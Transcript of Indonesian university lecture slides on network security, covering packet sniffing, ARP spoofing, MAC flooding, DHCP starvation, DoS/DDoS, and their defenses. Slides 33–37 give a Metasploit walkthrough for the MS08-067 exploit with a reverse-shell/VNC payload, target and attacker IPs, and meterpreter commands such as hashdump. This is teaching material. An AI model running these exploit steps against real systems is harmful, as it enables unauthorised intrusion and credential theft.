MODUL 2 BAHASA INDONESIA-KELOMPOK 1.pptx
MODUL 2 BAHASA INDONESIA-KELOMPOK 1.pptxMODUL 2 BAHASA INDONESIA-KELOMPOK 1.pptx
MODUL 2 BAHASA INDONESIA-KELOMPOK 1.pptx
 

Keamanan Jaringan Sniffing

  • 1. 1 Keamanan Jaringan 22. Sniffing Setia Juli Irzal Ismail D3 Teknologi Komputer – Fakultas Ilmu Terapan Telkom University.
  • 3. 3 SNIFFING • Sniffing merupakan usaha untuk membaca dan menganalisa paket yang lewat di jaringan menggunakan program packet sniffing • Mengendus • penyadapan 3
  • 4. 4 Sniffing - Teori •Mesin yang terhubung ke jaringan dapat mendengarkan semua paket/data di jaringan •Promiscuous Mode •Network Interface menangkap semua data •Termasuk data yang tidak ditujukan kepadanya 4
  • 5. 5 Paket/Data yang ditangkap • Trafik Syslog • Trafik Web • Email • Dll • Satu Jaringan / LAN 1. Data 2. Username 3. Password 4. Credit card 5 ekstrak
  • 6. 6 Protokol target • http • Pop • IMAP • SMTP • NMTP • FTP • Telnet • Rlogin • dll 6
  • 7. 7 Keamanan Jaringan 23. Teknik Sniffing Setia Juli Irzal Ismail D3 Teknologi Komputer – Fakultas Ilmu Terapan Telkom University.
  • 8. 8 Hardware Protocol Analyzer • Perangkat monitoring jaringan 8
  • 9. 9 • SPAN Port pada router Cisco • Mirroring semua paket 9 SPAN Port Cisco
  • 10. 10 Teknik Sniffing • ARP Spoofing • MAC Flooding • DNS Poisoning • DHCP starvation attack • Switch Port Stealing • dll 10
  • 11. 11 • Membanjiri Switch dengan alamat MAC palsu • Tabel CAM : Mapping MAC --> Port • Broadcast • Tools: Macof, Dsniff • Defend: Fitur Cisco Port Security, membatasi Mac Address pd port 11/ Mac Flooding
  • 12. 12 • Membanjiri DHCP Server dgn DHCP request • Korban tidak dapat IP • Rogue DHCP/ DHCP palsu • Tools: gobbler, dhcpstarv, yersinia • Defend: fitur Port Security, fitur DHCP Snooping 12 DHCP Starvation Attack
  • 13. 13 Keamanan Jaringan 24. ARP Spoofing Setia Juli Irzal Ismail D3 Teknologi Komputer – Fakultas Ilmu Terapan Telkom University.
  • 14. 14 • Merubah tabel ARP pada switch • Menyadap paket yang ditujukan ke komputer korban • Tools: Cain & Abel, WinARP attacker, Ufasoft Sniff • Defend:Dynamic ARP Inspection, (DHCP Snooping) • Deteksi: XArp 14 ARP Spoofing
  • 15. 15 • Merubah MAC , Cloning MAC • Tools: SMAC • Defend: DHCP Snooping Binding Table, Dynamic ARP Inspection, IP source guard, Enkripsi • DNS Poisoning: Merubah DNS • Trafik Internet diarahkan ke web palsu • Defend: DNSSec, SSL, Tabel Static ARP & IP, Enkripsi 15 MAC Spoofing
  • 17. 17 • Wireshark • SteelCentral Packet Analyzer • TCPdump/Windump • Capsa Network Analyzer • OmniPeek Network Analyzer • Observer • Sniff-O-Matic • Colasoft Packet Builder • RSA NetWitness Investigator • Wi.Cap Network Sniffer Pro • FaceNiff 17 Tools Monitoring Trafik Jaringan
  • 19. 19 Keamanan Jaringan 25. Metasploit Setia Juli Irzal Ismail D3 Teknologi Komputer – Fakultas Ilmu Terapan Telkom University.
  • 20. 20 • HD Moore • Defcon 12 – 2004 • exploit frameworks • Tools untuk menguji keamanan sistem • http://www.metasploit.com 20 Hacking Like in the movies
  • 21. 21 • Vulnerabilities celah keamanan yang dapat dieksploitasi • exploit script/kode yang kita kirimkan ke komputer target utk memudahkan kita memasang payload • payload scripts yang kita gunakan untuk menjalankan berbagai perintah di komputer target. 21 Glossary
  • 22. 22 Langkah • Scanning à celah keamanan • Pilih sebuah Target • Pilih sebuah Exploit • Pilih sebuah Payload • Jalankan exploit 22
  • 23. 23 Payload • Menambahkan user baru • Memasang backdoors, • Menginstall sebuah aplikasi baru pada komputer target • Mematikan komputer 23
  • 24. 24 Setiap Sistem Unik • Beda operating systems (OS), beda exploit • Sistem operasi sama tapi beda services, dan proces dibutuhkan serangan yang berbeda • Perlu memasang exploit yang pas dengan vulnerabilities 24
  • 25. 25 Keamanan Jaringan 26.Mencari Celah Keamanan Setia Juli Irzal Ismail D3 Teknologi Komputer – Fakultas Ilmu Terapan Telkom University.
  • 26. 26 • Mencari celah keamanan • Nessus atau “Nmap --script vuln” • Daftar celah keamanan atau patch yang belum dipasang • Tingkatan Celah keamanan • Critical • High • Medium • low26 Mencari Celah Keamanan
  • 27. 27 • remote access • Secure shell (SSH) • Telnet • file transfer protocol (FTP) • PCAnywhere • virtual network computing (VNC) 27 Target
  • 28. 28 • Contoh Vulnerability hasil scanning dgn nmap • Ditemukan celah keamanan CVE-2011- 3192 28
  • 29. 29 • Critical • MS08-067 • MS09-001 29 Nessus
  • 30. 30 Database Celah Keamanan • Common Vulnerabilities and Exposures (CVE), • Open Source Vulnerability Database (OSVDB) • Insecure.org • Microsoft patch MS08-067 has not been installed on the target machine. • missing Microsoft patch MS09-001 30
  • 31. 31 Keamanan Jaringan 27. Payload Setia Juli Irzal Ismail D3 Teknologi Komputer – Fakultas Ilmu Terapan Telkom University.
  • 32. 32 • msfconsole : • number of exploits, • payloads, • encoders, • msfupdate • search ms08-067 32 Msfconsole
  • 33. 33 • use exploit/windows/smb/ms08_067_netapi • show payloads • set payload windows/vncinject/reverse_tcp • set RHOST 192.168.18.131 : RHOST alamat IP Target • set LHOST 192.168.18.130 : LHOST (local host) alamat IP Penyerang • show options • exploit 33 Pilih Payload
  • 34. 34 1. Jalankan Metasploit melalui terminal : msf> msfconsole 2. Jalankan perintah “search” untuk mencari exploits yang sesuai dengan celah keamanan pada komputer target msf> search cve (celah keamanan)/service yg tersedia 3. Gunakan perintah “use” untuk memilih exploit 4. msf> use exploit_name 5. Gunakan perintah “show payloads” untuk menampolkan payload yang bisa digunakan 6. msf> show payloads 34 Langkah penyerangan
  • 35. 35 7. Gunakan perintah “set” untuk memilih payload: msf> set nama_payload 8. Gunakan perintah “show options” untuk menampilkan pilihan yang tersedia msf> show options 9. Jalankan perintah “set” untuk memilih opsi yang tersedia 10. msf> set pilihan_opsi 11. Jalankan perintah “exploit” untuk menjalankan exploit 12. msf> “exploit” 35 Langkah memilih payload
  • 36. 36 Jenis Payload • Windows/adduser • Windows/exec • Windows/shell_bind_tcp • Windows/shell_reverse_tcp • Windows/meterpreter/bind_tcp • Windows/Meterpreter/reverse_tcp • Windows/vncinject/bind_tcp • Windows/vncinject/reverse_tcp • Tambah user • Jalankan file .exe • Menjalankan shell di komputer target • installs meterpreter • Install vnc 36
  • 37. 37 Meterpreter • Windows cmd.exe; Linux /bin/sh • migrate • cat • download • upload • edit • execute • Kill • cd”, • “ls”, • “ps”, • “shutdown”, • “mkdir”, • “pwd”, • “ifconfig” • hashdump 37
  • 38. 38 Keamanan Jaringan 28. DoS Attack Setia Juli Irzal Ismail D3 Teknologi Komputer – Fakultas Ilmu Terapan Telkom University.
  • 39. 39 • serangan dengan cara menghabiskan sumber daya (resource) • tidak dapat menjalankan fungsinya dengan benar • Lemot/ down • Availability • Caranya: membanjiri dengan data 39 Denial of Service
  • 40. 40 Jenis DoS • Bandwidth Flooding • Syn Flooding • Icmp Flooding • Peer-to-peer Attack • Application level Flood Attack • Permanen DoS Attack • Distributed Reflection DoS (DrDoS) 40
  • 41. 41 • Pandora Toolkit • Dereil, Hoic • DosHttp, BanglaDos • Andosid • LOIC 41 Tools Dos
  • 42. 42 • Distributed Denial of Service • Serangan DoS secara serentak, bersama-sama, terkoordinir • Banyak penyerang • Satu Target • Botnet • Blackshades NET,Chytosia Botnet, AndromedaBot, PlugBot, 42 DDoS
  • 43. 43 • Penambahan Resource à load balancing • Matikan Layanan • Alihkan Trafik à Honeypot • Drop request • Firewall • IDS 43 Penanganan DoS
  • 45. 45 Buku Bacaan Wajib (BW) Engebretson, P. (2011). The Basic of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy. Syngress. Stallings, W. (2010). Network Security Essentials:Applications and Standards 4th Edition. Prentice Hall. Buku Bacaan Anjuran (BA) Harris, S. (2010). CISSP All in One Exam Guide, 5th Edition. McGraw Hill. Walker, M. (2010). CEH Certified Ethical Hacker All-in-One. McGraw Hill. 45 Referensi